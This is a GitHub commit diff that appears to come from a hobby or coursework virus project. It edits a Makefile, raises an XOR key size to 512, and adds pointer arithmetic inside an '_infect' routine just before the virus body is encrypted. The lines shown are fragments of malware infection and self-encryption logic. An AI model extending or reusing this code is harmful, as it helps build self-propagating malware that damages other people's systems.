File tree 3 files changed +6
-2
lines changed
3 files changed +6
-2
lines changed Original file line number Diff line number Diff line change @@ -37,7 +37,7 @@ fsociety: all
37
37
38
38
# VARIABLES RULES #
39
39
40
- $(NAME ) : $(OBJS_ASM ) $( OBJS )
40
+ $(NAME ) : $(OBJS )
41
41
@printf " \033[2K\r$( _BLUE) All files compiled into '$( DIR_OBJS) '. $( _END) ✅\n"
42
42
@ld -s -o $@ $^
43
43
@printf " \033[2K\r$( _GREEN) Executable '$( NAME) ' created. $( _END) ✅\n"
Original file line number Diff line number Diff line change @@ -87,4 +87,4 @@ endstruc
87
87
88
88
; KEY
89
89
90
- %define KEY_SIZE 256
90
+ %define KEY_SIZE 512
Original file line number Diff line number Diff line change @@ -1163,6 +1163,10 @@ _infect:
1163
1163
push rdx
1164
1164
sub rsi , rcx ; length - (_virus - _params)
1165
1165
lea rdx , [ rel _h3ll0w0rld ]
1166
+ sub rdx , rcx
1167
+ add rdx , rdi
1168
+ lea rcx , [ rel _params ]
1169
+ sub rdx , rcx
1166
1170
mov rcx , KEY_SIZE
1167
1171
call _xor_encrypt
1168
1172
You can’t perform that action at this time.
0 commit comments